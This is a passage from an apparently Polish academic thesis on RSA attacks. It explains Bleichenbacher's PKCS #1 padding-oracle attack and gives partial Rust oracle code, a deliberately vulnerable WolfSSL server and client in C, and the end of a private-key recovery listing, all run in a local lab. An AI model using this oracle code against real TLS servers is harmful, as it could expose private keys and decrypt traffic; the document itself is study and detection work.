     let message: &str = "Other secret message";
15
16
     let m: Integer = Integer::from_digits(message.as_bytes(), Order::MsfBe);
17
     let c = m.pow_mod(&e, &n).unwrap();
18
     let mut num: Integer = e.clone();
19
20
     let mut den: Integer = n.clone();
21
     let mut q: Integer;
     let (_, mut r) = num.clone().div_rem(den.clone());
22
23
     let mut d1: Integer = Integer::from(1);
     let mut d2: Integer = Integer::from(0);
24
25
     let mut d: Integer;
     let mut m: Integer;
26
27
     while r != Integer::ZERO {
28
        num = den.clone();
29
30
        den = r.clone();
31
        (q, r) = num.clone().div_rem(den.clone());
32
        d = q.clone() * d1.clone() + d2.clone();
33
        m = match c.clone().pow_mod(&d, &n) {
34
35
            0k(m) => m,
36
            Err(_) => unreachable!(),
37
        };
38
39
        let arr: Vec<u8> = m.to_digits::<u8>(Order::MsfLe);
        let mut str: String = String::new();
40
        for i in arr {
41
42
            str.push(i as char);
43
        }
        if str.is_ascii() {
44
            println!("Decrypted message: {}", str);
45
46
            break;
47
        }
48
        d2 = d1.clone();
        d1 = d.clone();
```

```
50 }
51 println!("Here is your private key: {}", d1);
52 }
```

Listing 3.4. ./ssl attack/src/main.rs od 19 do 70

Uzyskano tajna wiadomość "Other Secret Message" oraz klucz prywatny o wartości:

d = 16947.

3.6. Atak z wybranym szyfrogramem Bleichenbachera

3.6.1. PKCS #1 [4]

W standardzie PKCS #1 w bloku dedykowanym szyfrowaniu dane są formatowane w następujący sposób. Niech (n,e) będzie kluczem publicznym, a d kluczem prywatnym systemu RSA. Niech k będzie długością bajtową n. Wiadomo, że $2^{8(k-1)} \leq n \leq 2^{8k}$. Dla bloku danych D o długości |D| bajtów jest tworzony pseudolosowo łańcuch PS o długości bajtowej k-3-|D|, gdzie żaden bajt nie jest zerowy. Blok wiadomości jest tworzony przez konkatenacje bajtową (||): EB = 00||02||PS||00||D. Blok ten jest konwertowany w liczbę x i zaszyfrowany $c = x^e \pmod{n}$.

Odbiorca szyfrogramu odszyfrowuje i szuka drugiego zerowego bajta. Ten bajt sygnalizuje koniec bloku uzupełniającego, więc bajty dalej są blokiem danych D.

Twierdzenie 3.3 (Zgodność PKCS #1). Zaszyfrowany blok danych EB składający się z k bajtów, to jest

$$EB = EB_1||EB_2||\dots||EB_k$$

nazywany jest zgodny z PKCS #1, jeżeli spełnia następujące warunki:

- $EB_1 = 00$.
- $EB_2 = 02$.
- EB_3 do EB_{10} są niezerowe.
- Co najmniej jeden z bajtów pomiędzy EB_{11} i EB_k jest 00.

3.6.2. Idea [5]

W tym typie ataku przy wysłaniu szyfrogramu c uzyskana jest informacja tak albo nie, czy wiadomość jest zgodna z PKCS #1. Zatem strona odpowiadająca działa jako wyrocznia. To jest wystarczające, żeby uzyskać informacje na temat wiadomości jawnej. Niech użytkownik O chce uzyskać wiadomość jawną $m=c^d\pmod{n}$. O wybiera liczbę s i oblicza $c'=c\cdot s^e\pmod{n}$. Wysyła ten szyfrogram do wyroczni i uzyskuje informację, czy jest zgodna z PKCS #1. Jeżeli odpowiedź jest tak, to O wie, że pierwsze bajty są 00 i 02 zatem, oznaczając $B=2^{8(k-2)}$

$$2B \le ms \pmod{n} \le 3B$$

Szukając różne wartości s_i uzyskuje się kolejno nowe przedziały do których może należeć wiadomość m. Część wspólna tych przedziałów będzie zawężała możliwe wartości m aż do momentu gdzie będzie możliwa tylko jedna wartość.

4. Przykład ataku Bleichenbachera

W tym rozdziale opisano własną implementację ataku z wybranymi szyfrogramami Bleichenbachera (ang. Bleichenbacher's choosen ciphertext attack). Opisano także implementację własnego serwera wrażliwego na ten atak oraz możliwe wektory ataku.

4.1. Tworzenie certyfikatu SSL i kompilacja

Do połączeń z protokołem SSL, konieczne jest posiadanie odpowiedniego certyfikatu. Certyfikat ten zawiera klucz publiczny oraz informacje na temat właściciela certyfikatu, tak jak, nazwa firmy, adres email i inne. Taki certyfikat wygenerowano za pomocą biblioteki *OpenSSL*.

Utworzono certyfikat odpowiadający za własny urząd certyfikacji. Za pomocą tego certyfikatu podpisano certyfikat serwera. Aby stworzyć certyfikat, który zawiera klucz publiczny RSA, należy najpierw stworzyć klucz prywatny. W tym przypadku, plik z kluczem prywatnym zawiera także klucz publiczny.

Certyfikat publiczny urzędu certyfikacji podłączono do klienta, co pozwoli na poprawną weryfikacje certyfikatu serwera. Ten certyfikat można także załadować do normalnej przeglądarki internetowej w celu podłączenia się do serwera, lub wykorzystać do podpisywania innych certyfikatów.

Dla tego projektu utworzono makefile, co pozwala na szybkie kompilowanie kodu źródłowego.

4.2. Serwer z WolfSSL

Na podstawie artykułu [5] pobrano wrażliwą wersje biblioteki *WolfSSL*. Jest to wersja 3.11.0. Bibliotekę należało skompilować samodzielnie, żeby móc z niej korzystać. Wykonano tą czynność wpisując poniższe komendy do wiersza poleceń systemu zwracając uwagę, żeby znaleźć się w folderze z kodem źródłowym.

```
2 $ make
3 $ make install
```

Korzystając z dokumentacji na przykładzie dostępnej wraz z kodem źródłowym, napisano własną wersję serwera. Serwer ten, po podłączeniu z klientem odpowie wiadomością na podstawie wiadomości wysłanej przez klienta.

- Jeżeli serwer uzyska wiadomość "get", to wyśle klientowi tajne hasło.
- Jeżeli serwer uzyska wiadomość "shutdown", to wyśle komunikat i ulegnie wyłączeniu.
- Jeżeli serwer uzyska inną wiadomość niż powyżej, to wyśle wiadomość głównego przeznaczenia.

Jeżeli wystąpi błąd, na jakimkolwiek etapie połączenia, to wyświetlony zostanie komunikat, który wyjaśni w skrócie rodzaj błędu. Poniżej przedstawiono kod źródłowy serwera napisany w języku programowania C.

```
#include <stdlib.h>
2 #include <stdio.h>
  #include <string.h>
5 #include <sys/socket.h>
6 #include <arpa/inet.h>
7 #include <netinet/in.h>
  #include <unistd.h>
  #include <wolfssl/ssl.h>
9
10
  #define DEFAULT_PORT 9001
11
12
13 #define CERT_FILE "./cert/certS.pem"
14
  #define KEY_FILE "./cert/key.pem"
15
16 static void ShowCiphers(void) {
17
       char ciphers[255];
       int ret = wolfSSL_get_ciphers(&ciphers[0], (int)sizeof(ciphers));
18
19
20
       if (ret == SSL_SUCCESS) printf("Available ciphers:\n%s\n", &ciphers[0]);
21 }
22
23 int main() {
24
       int sockfd;
25
      int connd;
26
       struct sockaddr_in servAddr;
27
       struct sockaddr_in clientAddr;
       socklen_t size = sizeof(clientAddr);
28
29
       char buff[25500];
       size_t len;
30
31
       int shutdown = 0;
       WOLFSSL_CTX * ctx;
```

```
33
      WOLFSSL * ssl;
34
       char * ciphers = "AES128-SHA256:AES256-SHA256";
35
       int err;
36
37
       wolfSSL_Debugging_ON();
38
       wolfSSL_Init();
39
      if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
40
41
           fprintf(stderr, "ERROR: Failed to create socket\n");
42
           return -1;
43
      }
44
45
       if((ctx = wolfSSL_CTX_new(wolfTLSv1_2_server_method())) == NULL) {
           fprintf(stderr, "ERROR: failed to create CTX (context)\n");
46
47
           return -1;
      }
48
49
50
       if(wolfSSL_CTX_use_certificate_file(ctx, CERT_FILE, SSL_FILETYPE_PEM)
               != SSL_SUCCESS) {
51
52
           fprintf(stderr, "ERROR: failed to load certificate %s\n", CERT_FILE);
53
           return -1:
      }
54
55
       if(wolfSSL_CTX_use_PrivateKey_file(ctx, KEY_FILE, SSL_FILETYPE_PEM)
56
57
               != SSL_SUCCESS) {
58
           fprintf(stderr, "ERROR: failed to load private key file %s\n", KEY_FILE);
59
           return -1;
60
      }
61
       if(wolfSSL_CTX_set_cipher_list(ctx, ciphers) != SSL_SUCCESS) {
62
63
           fprintf(stderr, "ERROR: failed to set cipher list\n");
64
           return -1;
65
66
67
       memset(&servAddr, 0, sizeof(servAddr));
68
69
       servAddr.sin_family = AF_INET;
70
       servAddr.sin_port = htons(DEFAULT_PORT);
71
       servAddr.sin_addr.s_addr = INADDR_ANY;
72
73
      if(bind(sockfd, (struct sockaddr*) &servAddr, sizeof(servAddr)) == -1) {
74
           fprintf(stderr, "ERROR: Failed to bind to port\n");
75
           return -1;
76
77
78
       if(listen(sockfd, 5) == -1) {
79
           fprintf(stderr, "ERROR: Failed to listen\n");
80
           return -1;
81
82
83
       // Connection skeleton
84
       char * reply = "Here is some data from the server. Use it well";
       char * password = "password123";
85
86
       char * shutdown_message = "Shutting down...";
```

```
87
        ShowCiphers();
        while(!shutdown) {
88
89
            printf("Waiting for connection...\n");
90
            if((connd = accept(sockfd, (struct sockaddr*)&clientAddr, &size)) == -1) {
91
92
                fprintf(stderr, "ERROR: connection refused\n");
93
                return -1;
            }
94
95
            printf("Accepted connection from %s:%d\n",
96
                    inet_ntoa(clientAddr.sin_addr), clientAddr.sin_port);
97
98
            if((ssl = wolfSSL_new(ctx)) == NULL) {
99
                fprintf(stderr, "ERROR: failed to create WOLFSSL object\n");
100
                return -1;
101
102
            wolfSSL_set_fd(ssl, connd);
103
104
            memset(buff, 0, sizeof(buff));
            if((err = wolfSSL_read(ssl, buff, sizeof(buff)-1)) == -1) {
105
106
                fprintf(stderr, "ERROR: failed to read or handshake error\n");
107
                fprintf(stderr, "ERROR: Resetting connection...\n");
108
                wolfSSL_write(ssl, "ERROR", sizeof("ERROR"));
109
                wolfSSL_free(ssl);
                close(connd);
110
111
                continue;
112
                //return -1;
            }
113
114
            printf("Message from client: %s\n", buff);
115
            if(strncmp(buff, "get", 3) == 0) {
116
117
                memset(buff, 0, sizeof(buff));
                memcpy(buff, password, strlen(password));
118
119
                len = strnlen(buff, sizeof(buff));
            } else if(strncmp(buff, "shutdown", 8) == 0) {
120
                printf("Shutting down\n");
121
122
                memset(buff, 0, sizeof(buff));
123
                memcpy(buff, shutdown_message, strlen(shutdown_message));
124
                len = strnlen(buff, sizeof(buff));
125
                shutdown = 1;
126
            } else {
127
                memset(buff, 0, sizeof(buff));
128
                memcpy(buff, reply, strlen(reply));
129
                len = strnlen(buff, sizeof(buff));
130
            }
131
            if(wolfSSL_write(ssl, buff, len) != len) {
132
133
                fprintf(stderr, "ERROR: failed to write data\n");
134
                return -1;
135
136
            wolfSSL_free(ssl);
137
138
            close(connd);
139
        7
140
        printf("Server closed\n");
```

Listing 4.1. ./WebServer/src/server.c

Serwer można uruchomić przez wiersz poleceń, natomiast nie jest konieczne wpisywanie argumentów. Port serwera jest ustalony z góry i jest to 9001.

4.3. Klient z WolfSSL

Klienta napisano także w języku programowania C, korzystając z biblioteki WolfSSL. Klient po podłączenia do serwera ma możliwość wysyłania wiadomości i uzyskania, jak wcześniej wspomniano, tajnego hasła lub wiadomości głównego przeznaczenia. Ponadto klient może wyłączyć serwer poprzez wysyłanie komendy "shutdown". Aby uruchomić klienta, należy podać jako argument wierszu poleceń adres IPv4, z którym należy nawiązać połączenie. W tym przypadku wykorzystano adres 127.0.0.1 który odpowiada za aktualną maszynę. Nie należy natomiast podawać portu ze względu na to, że jest on z góry ustalony. Jak wcześniej wspomniano, jest to port 9001. Poniżej przedstawiono kod źródłowy.

```
#include <stdlib.h>
2 #include <stdio.h>
3 #include <string.h>
  #include <sys/socket.h>
5
6 #include <arpa/inet.h>
  #include <netinet/in.h>
8 #include <unistd.h>
9
  #include <wolfssl/ssl.h>
10
11 #define DEFAULT_PORT 9001
12
13 #define CERT_FILE "./cert/rootCA.pem"
14
15
  int main(int argc, char ** argv) {
16
      int sockfd;
17
       struct sockaddr_in servAddr;
18
      char buff [255];
19
       size_t len;
20
       WOLFSSL_CTX * ctx;
      WOLFSSL * ssl;
21
22
       wolfSSL_Init();
```

```
24
25
       if(argc != 2) {
26
           printf("Usage: %s <IPV4 address>\n", argv[0]);
27
           return 0;
28
29
30
       if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
           fprintf(stderr, "ERROR: Failed to create socket\n");
31
32
           return -1;
33
       }
34
35
       if((ctx = wolfSSL_CTX_new(wolfTLSv1_2_client_method())) == NULL) {
36
           fprintf(stderr, "ERROR: failed to create CTX (context)\n");
37
           return -1;
38
39
40
       if(wolfSSL_CTX_load_verify_locations(ctx, CERT_FILE, NULL) != SSL_SUCCESS) {
           fprintf(stderr, "ERROR: failed to load CA list %s\n", CERT_FILE);
41
           return -1;
42
43
44
      memset(&servAddr, 0, sizeof(servAddr));
45
46
47
       servAddr.sin_family = AF_INET;
48
       servAddr.sin_port = htons(DEFAULT_PORT);
49
50
       if(inet_pton(AF_INET, argv[1], &servAddr.sin_addr) != 1) {
51
           fprintf(stderr, "ERROR: invalid server adress\n");
           return -1;
52
53
       }
54
       if(connect(sockfd, (struct sockaddr*) &servAddr, sizeof(servAddr)) == -1) {
55
56
           fprintf(stderr, "ERROR: Failed to connect\n");
57
           return -1;
      }
58
59
       if((ssl = wolfSSL_new(ctx)) == NULL) {
60
61
           fprintf(stderr, "ERROR: failed to create WOLFSSL object\n");
62
           return -1;
63
64
       wolfSSL_set_fd(ssl, sockfd);
65
       if (wolfSSL_connect(ssl) != SSL_SUCCESS) {
66
           fprintf(stderr, "ERROR: failed to connect with wolfssl\n");
67
68
           return -1;
69
       }
70
71
       printf("Chiper used: %s\n", wolfSSL_get_cipher(ssl));
72
      printf("get - get password, shutdown - shutdown\n");
       printf("Message for server: ");
73
       memset(buff, 0, sizeof(buff));
74
75
       fgets(buff, sizeof(buff), stdin);
76
       len = strnlen(buff, sizeof(buff));
77
```

```
78
       if(wolfSSL_write(ssl, buff, len) != len) {
           fprintf(stderr, "ERROR: failed to write to server\n");
79
80
           return -1;
81
82
       memset(buff, 0, sizeof(buff));
83
       if(wolfSSL_read(ssl, buff, sizeof(buff)-1) == -1) {
           fprintf(stderr, "ERROR: failed to read from server\n");
85
86
87
       printf("Message from server: %s\n", buff);
88
89
90
       wolfSSL_free(ssl);
       wolfSSL_CTX_free(ctx);
91
92
       wolfSSL_Cleanup();
93
       close(sockfd);
94
       return 0;
95 }
```

Listing 4.2. ./WebServer/src/client.c

4.4. Kod programu do ataku

Ze względu na ograniczenia czasowe nie zaimplementowano pełnego kodu programu. Własną wersję programu napisano na podstawie kodu wykonanego w języku Python. Autorzy tego kodu to *Hanno Böck* oraz *Michael Scovetta*. Link tego kodu podano w bibliografii [8].

Pomimo niepełnego programu, napisano funkcje umożliwiające wysyłanie danych w celu sprawdzenia zgodności z PKCS #1. Poniżej przedstawiono funkcję, która łączy się z serwerem poprzez SSL/TLS i zwraca jego klucz publiczny.

```
pub fn get_rsa_from_server(host: String, port: u16) -> (Integer, Integer){
      let mut connector_builder = SslConnector::builder(SslMethod::tls()).unwrap();
2
3
      connector_builder.set_verify(SslVerifyMode::NONE);
4
      let connector = connector_builder.build();
6
      let tmp: String = host.clone() + ":" + &port.to_string();
      let stream = TcpStream::connect(tmp).unwrap();
8
      let stream = connector.connect(&host, stream).unwrap();
9
10
      let key = stream.ssl().peer_certificate().unwrap().public_key().unwrap();
11
      let n = key.rsa().unwrap().n().to_owned();
12
      let e = key.rsa().unwrap().e().to_owned();
13
14
      let n_ret = n.unwrap().to_dec_str().unwrap().parse::<Integer>();
15
      let e_ret = e.unwrap().to_dec_str().unwrap().parse::<Integer>();
      return (n_ret.unwrap(), e_ret.unwrap());
```

Listing 4.3. ./ssl attack/src/lib.rs od 64 do 80

Poniżej przedstawiono najważniejszą funkcję tego ataku, czyli tą sprawdzającą zgodność PKCS #1.

```
pub fn bleichenbacher_oracle(host: String, port: u16, pms: &Vec<u8>)
                       -> Result <String, Box <dyn Error>> {
 3
              let ch_tls = Vec::from_hex("16030100610100005d
  4
              03034 f20 d66 cba 6399 e552 fd 735 d75 feb0 eea e2 ea2 ebb 357 c9004 e21 d0 c2574 f837 a000010009 feberariant and the companion of the compa
 6
               04020403030103020303020102020203".replace("\n","")
                       .replace(" ","")).unwrap();
 9
              let ch = ch_tls.as_slice();
10
11
              let ccs = Vec::from_hex("000101").unwrap();
               let enc = Vec::from_hex("005091a3b6aaa2b64d126e5583b04c113259c4efa4
12
               8e40a19b8e5f2542c3b1d30f8d80b7582b72f08b21dfcbff09d4b281676a0fb40d48c20c4f38
13
               8617ff5c00808a96fbfe9bb6cc631101a6ba6b6bc696f0".replace("\n","")
14
15
                       .replace(" ","")).unwrap();
16
              let tmp: String = host.clone() + ":" + &port.to_string();
17
18
               let mut stream = TcpStream::connect(&tmp).unwrap();
               stream.set_nodelay(true).expect("set_nodelay failed");
19
20
               stream.set_write_timeout(Some(Duration::new(5,0)))
21
                       .expect("failed to set nonblocking");
               stream.set_read_timeout(Some(Duration::new(5,0)))
22
23
                       .expect("failed to set nonblocking");
24
25
               stream.write_all(&ch)?;
26
              // let cke_2nd_prefix = format!("{:x}",modulus_bytes + 6) + "1000" +
27
28
                           &format!("{:x}",modulus_bytes + 2) + &format!("{:x}",modulus_bytes);
29
              let cke_2nd_prefix = b"\x01\x06\x10\x00\x01\x02\x01\x00";
30
              let mut buff = vec![0; 4096];
31
               stream.read(&mut buff)?;
32
33
34
               let cke_version = Vec::from(&buff[9..11]);
35
36
              let mut tmp: Vec<u8> = Vec::from([b"\x16"[0]]);
37
              tmp = [tmp, cke_version.clone()].concat();
38
               stream.write(&tmp)?;
39
40
               stream.write(cke_2nd_prefix)?;
41
42
              stream.write(&pms)?;
43
               tmp = Vec::from_hex("14").unwrap();
45
               tmp = [tmp, cke_version.clone()].concat();
46
               tmp = [tmp, ccs].concat();
               stream.write(&tmp)?;
```

```
48
49
       tmp = Vec::from_hex("16").unwrap();
       tmp = [tmp, cke_version.clone()].concat();
50
51
       tmp = [tmp, enc].concat();
52
       stream.write(&tmp)?;
53
       let bend = stream.read_to_end(&mut buff)?;
       if bend == 0 {
55
56
           stream.shutdown(Shutdown::Both)?;
57
           return Ok(String::from("Ok"))
58
       }
59
60
       stream.shutdown(Shutdown::Both)?;
61
       Ok(String::new())
62 }
```

Listing 4.4. ./ssl_attack/src/lib.rs od 82 do 143

Funkcja ta wysyła do serwera ClientHello, w którym uwzględniono specyfikacje szyfru zawierające RSA. Wartości losowe z tego bloku są ustalone z góry, ponieważ nie jest koniecznie uzyskania poprawnego połączenia. Z danych otrzymanych od serwera brana jest wersja SSL/TLS, ponieważ jest konieczna do dalszej wymiany danych. Ponieważ blok z szyfrowanymi danymi rozpoczyna się od 0x0100, to po wysłaniu odpowiednich bajtów z długościami, zrobiono konkatenację z danymi, które są sprawdzane. Wysłany jest ChangeCipherSpec, a następnie odczytywane są dane od serwera. W całym kodzie sprawdzane są błędy. W ostatnim czytaniu spodziewany jest błąd, dlatego rozpatrywany jest osobno.

Funkcja zwraca odpowiedź (and. result) która może być łańcuchem lub błędem. Jeżeli nie nastąpią problemy, to odpowiedź przyjmie wartość pustego łańcucha ..". W przeciwnym wypadku odpowiedź będzie błędem zawierającym rodzaj błędu.

Poniżej przedstawiono kod programu wykorzystujący powyższe funkcje.

```
fn bleichenbacher_example(host: String, port: u16) {
2
3
      let (n, e) = get_rsa_from_server(host.clone(), port.clone());
      println!("n: {}\ne: {}", n, e);
4
5
6
      let modulus_bytes = n.to_digits::<u8>(Order::MsfLe).len();
7
      let modulus_bits = &modulus_bytes * 8;
8
9
      println!("Modulus bits: {}", modulus_bits);
10
      println!("Modulus bytes: {}", modulus_bytes);
11
12
      let pad_len = (modulus_bytes - 48 - 3) * 2;
13
      let len = (pad_len / 2) as i32 + 1;
```

```
14
       let mut rnd_pad = String::new();
15
       for _i in 1..len {
16
           rnd_pad += "abcd";
17
18
       rnd_pad.drain(pad_len..rnd_pad.len());
       println!("Pad len: {}\nRnd pad len: {}", pad_len, rnd_pad.len());
19
20
21
       let hex_test = Vec::from_hex("aa11").unwrap();
22
       let int_test = Integer::from_digits(hex_test.as_slice(), Order::MsfLe);
23
       println!("Integer: {}", int_test);
24
25
       let rnd_pms = "aa1122334455667788991122334455667788
26
           99112233445566778899112233445566778899112233445566778
           899".replace("\n","").replace(" ","");
27
       let pms_good_str = String::from("0002") + &rnd_pad + "000303" + &rnd_pms;
28
       let pms_good_vec = Vec::from_hex(pms_good_str).unwrap();
29
30
       let pms_good_in = Integer::from_digits(pms_good_vec.as_slice(), Order::MsfLe);
31
       // wrong first two bytes
       let pms_bad_str1 = String::from("4117") + &rnd_pad + "00" + "0303" + &rnd_pms;
32
33
       let pms_bad_vec1 = Vec::from_hex(pms_bad_str1).unwrap();
       let pms_bad_in1 = Integer::from_digits(pms_bad_vec1.as_slice(), Order::MsfBe);
34
35
       // 0x00 on a wrong position, also trigger older JSSE bug
       let pms_bad_str2 = String::from("0002") + &rnd_pad + "11" + &rnd_pms + "0011";
36
       let pms_bad_in2 = Integer::from_digits(pms_bad_str2.as_bytes(), Order::MsfBe);
37
38
       // no 0x00 in the middle
       let pms_bad_str3 = String::from("0002") + &rnd_pad + "11" + "1111" + &rnd_pms;
39
40
       let pms_bad_in3 = Integer::from_digits(pms_bad_str3.as_bytes(), Order::MsfBe);
       // wrong version number (according to Klima / Pokorny / Rosa paper)
41
       let pms_bad_str4 = String::from("0002") + &rnd_pad + "00" + "0202" + &rnd_pms;
42
43
       let pms_bad_in4 = Integer::from_digits(pms_bad_str4.as_bytes(), Order::MsfBe);
44
45
       let pms_good = pms_good_in.pow_mod(&e, &n).unwrap()
46
           .to_digits::<u8>(Order::MsfBe);
       println!("pms good {}", pms_good.as_slice().escape_ascii().to_string());
47
48
       println!("length {}", pms_good.len());
49
       let pms_bad1 = pms_bad_in1.pow_mod(&e, &n).unwrap()
50
           .to_digits::<u8>(Order::MsfBe);
51
       let pms_bad2 = pms_bad_in2.pow_mod(&e, &n).unwrap()
52
           .to_digits::<u8>(Order::MsfBe);
53
       let pms_bad3 = pms_bad_in3.pow_mod(&e, &n).unwrap()
54
           .to_digits::<u8>(Order::MsfBe);
       let pms_bad4 = pms_bad_in4.pow_mod(&e, &n).unwrap()
55
56
           .to_digits::<u8>(Order::MsfBe);
57
58
       let good = bleichenbacher_oracle(host.clone(), port.clone(), &pms_good);
       let bad1 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad1);
59
60
       let bad2 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad2);
61
       let bad3 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad3);
62
       let bad4 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad4);
63
64
       println!("is good good: {}, {}", good.is_ok(), good.unwrap());
65
       println!("is bad1 good: {}, {}", bad1.is_ok(), bad1.unwrap_or_default());
       println!("is bad2 good: {}, {}", bad2.is_ok(), bad2.unwrap_or_default());
66
       println!("is bad3 good: {}, {}", bad3.is_ok(), bad3.unwrap_or_default());
```

```
68
       println!("is bad4 good: {}, {}", bad4.is_ok(), bad4.unwrap_or_default());
69
70
       //blinding
       let c_str = "49 2d ab 7c 1f 1d 33 db d1 d6 db e7 57
71
                c8 ec 47 31 f4 3c bf 43 94 16 85 6d b2 65 97
72
73
                07 59 e7 d8 43 9f 8e 46 cc a1 8b c7 28 df e0
74
                67 93 03 d2 66 c1 44 ea 05 e4 51 2c 6f 23 42
                d6 09 e4 36 37 6a 72 8d cd a7 6f 4a 75 01 c2
75
76
                ef 8b 45 a8 39 e9 3a 5a 07 6b 29 35 3d 4d 9e
77
                15 59 06 6c d4 61 21 8c c1 8e e2 89 7d b9 e7
78
                f7 d6 66 9b 66 54 2f 4a 2d d0 9c ac f1 99 4f
79
                49 67 61 01 0d 5f a2 83 3a 9c 27 2f 64 74 6a
80
                24 c4 b8 a9 9c e2 a3 df b8 68 9f 23 9b 73 6e
                6a fa 2a a6 d0 a4 94 3c 94 25 f8 19 f4 87 4d
81
                5f be 0c 97 a0 33 e3 1e dc d9 5b 46 c4 b1 88
82
                37 22 14 80 07 22 4c a8 c8 da d7 4f 48 06 48
83
84
                d4\ d5\ 3e\ 8a\ 73\ 74\ aa\ cd\ 55\ b2\ 64\ bc\ 77\ 73\ 40
85
                7b 96 6e 2a 72 e7 39 4e 54 f2 5b b7 cc eb c5
                73 36 cc d0 66 e1 35 38 2e cb 50 29 38 f5 35
86
87
                a5 1f f0 74 95 5a 64 4a 1f b6 88 d1 6d c5 0c
88
                6a da a7";
       let c = Vec::from_hex(c_str.replace(" ","").replace("\n","")).unwrap();
89
90
       let mut count = 0;
       let mut s0 = 1;
91
92
       let mut c0 = Integer::from(s0).pow_mod(&e, &n).unwrap()
93
            * Integer::from_digits(&c, Order::MsfBe);
94
       loop {
95
            if count % 1000 == 0 {
                println!("{} query", count);
96
97
98
            match bleichenbacher_oracle(host.clone(),
99
                port.clone(),
100
                &c0.to_digits::<u8>(Order::MsfBe)) {
101
                    0k(_) => break,
                    Err(_) => ()
102
103
                };
104
            s0 += 1;
105
            c0 = Integer::from(s0).pow_mod(&e, &n).unwrap()
106
                * Integer::from_digits(&c, Order::MsfBe);
107
            count += 1;
108
109
       println!("s0: {}", s0);
110 }
```

Listing 4.5. ./ssl attack/src/main.rs od 206 do 315

Ta funkcja sprawdza cztery przypadki: jeden zgodny z PKCS #1, jeden z błędnymi początkowymi bajtami, jeden z błędnym położeniem drugiego zerowego bajta, a jeden z błędną wersją SSL/TLS. Idea za tym jest taka, żeby błąd drugiego przypadku różnił się od pozostałych dwóch błędnych formatowań. Wtedy można rozróżnić

czy wiadomość jawna ma zerowy bajt na początku, a zatem wyznaczyć przedziały.

Dalsza część kodu [4] polega na sprawdzaniu wartości s_0 , dla których $c(s_0)^e$ (mod n) jest zgodne z PKCS #1. Wyznacza się wtedy początkowy przedział $M_0 = [2B, 3B - 1]$, gdzie $B = 2^{8(k-2)}$, a k jest długością bajtową liczby n. Ten proces można pominąć, jeżeli posiada się już zgodny szyfrogram. W kodzie ten szyfrogram znajduje się pod c str i został także pokazany w rozdziałe drugim.

Dalej program powinien szukać przedziałów, w których może się odszyfrowana wiadomość znajdować. W przypadku, gdy pierwszy przedział został już znaleziony, to program kolejno musiał by sprawdzać wartości s_i i r_i takie, że

$$r_i \ge \frac{2(bs_{i-1} - 2B)}{n}$$

oraz

$$\frac{2B + r_i n}{b} \le s_i \le \frac{3B + r_i n}{a}.$$

W przypadku, gdy został już znaleziony więcej niż jeden przedział, to szukane są kolejne wartości wartości $s_i > s_{i-1}$ dla których $c \cdot (s_i)^e \pmod{n}$ jest zgodne z PKCS #1.

Przy znalezieniu wartości s_i obliczany jest kolejny przedział zgodnie ze wzorem

$$M_i = \bigcup_{(a,b,r)} \left\{ \left[\max \left(a, \left\lceil \frac{2B + rn}{s_i} \right\rceil \right), \min \left(b, \left\lfloor \frac{3B - 1 + rn}{s_i} \right\rfloor \right) \right] \right\},$$

gdzie
$$[a, b] \in M_{i-1}$$
 oraz $\frac{as_i - 3B + 1}{n} \le r \le \frac{bs_i - 2B}{n}$.

W pewnym momencie lewa i prawa strona przedziału będą równe, co oznacza, że znaleziony został tekst jawny. W przypadku własnego serwera, zostawiono program pobrany z [8] na dwa dni. Wykonał w tym czasie około 3000000 kwerend, z których żadna nie oddała zgodność z PKCS #1. Potwierdza to, że wyrocznia jest słaba.

4.5. Dalsze możliwości rozwoju

Napisany program można dostosować, żeby wykrywał wrażliwość na ten atak w innych także serwerach i aplikacjach. Ponieważ konieczne jest wysyłanie danych do serwera, optymalizacja kodu nie wpływa na prędkość działania. Można natomiast

stosować bardziej optymalne biblioteki do liczb dowolnej dokładności.

Co do programów omówionych we wcześniejszym rozdziale, także można takie optymalizacje wykonać, oraz dostosować skrypt tak, aby obejmował więcej przypadków.

Bibliografia

- Alfred J. Menezes, Paul C. van Oorschot, Scott A. Vanstone, Kryptografia stosowana, WNT, Warszawa, 2005
- [2] Rolf Oppliger, SSL and TLS Theory and Practice, ARTECH HOUSE, Norwood, 2016
- [3] Dan Boneh Twenty Years of Attacks on the RSA Cryptosystem, Notices of the American Mathematical Society, volume 46, 1999
- [4] Hugo Krawczyk (ed.), Advances in cryptology Crypto '98, 18th Annual International Cryptology Conference, Springer, Santa Barbara, California, USA, [IACR]. Berlin; Heidelberg; New York; Barcelona; Budapest; Hong Kong; London; Milan; Paris; Singapore; Tokyo, (August 23 27, 1998).
- [5] Hanno Böck (unaffiliated), Juraj Somorovsky, Craig Young, Return Of Bleichenbacher's Oracle Threat (ROBOT), Usenix, Baltimore USA, August 15-17 2018
- [6] Calvin T. Long, Elementary Introduction to Number Theory, D. C. HEATH AND COMPANY, Boston, 1965
- [7] Marek Zakrzewski, Markowe Wykłady z Matematyki, GiS, Wrocław, 2017
- [8] Hanno Böck, Michael Scovetta, https://github.com/robotattackorg/robot-detect

Dodatek A

Kod programu serwera wykorzystanego w ostatnim rozdziale.

```
1 #include <stdlib.h>
2 #include <stdio.h>
3 #include <string.h>
4
5 #include <sys/socket.h>
6 #include <arpa/inet.h>
7 #include <netinet/in.h>
  #include <unistd.h>
9 #include <wolfssl/ssl.h>
10
11 #define DEFAULT_PORT 9001
12
13 #define CERT_FILE "./cert/certS.pem"
14 #define KEY_FILE "./cert/key.pem"
15
16 static void ShowCiphers(void) {
17
      char ciphers [255];
18
      int ret = wolfSSL_get_ciphers(&ciphers[0], (int)sizeof(ciphers));
19
      if (ret == SSL_SUCCESS) printf("Available ciphers:\n%s\n", &ciphers[0]);
20
21 }
22
23 int main() {
24
      int sockfd;
25
      int connd;
      struct sockaddr_in servAddr;
27
      struct sockaddr_in clientAddr;
28
      socklen_t size = sizeof(clientAddr);
29
      char buff [25500];
30
      size_t len;
31
      int shutdown = 0;
32
      WOLFSSL_CTX * ctx;
33
      WOLFSSL * ssl;
      char * ciphers = "AES128-SHA256:AES256-SHA256";
34
35
      int err;
36
37
      wolfSSL_Debugging_ON();
      wolfSSL_Init();
38
39
       if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
40
           fprintf(stderr, "ERROR: Failed to create socket\n");
41
42
           return -1;
43
44
       if((ctx = wolfSSL_CTX_new(wolfTLSv1_2_server_method())) == NULL) {
45
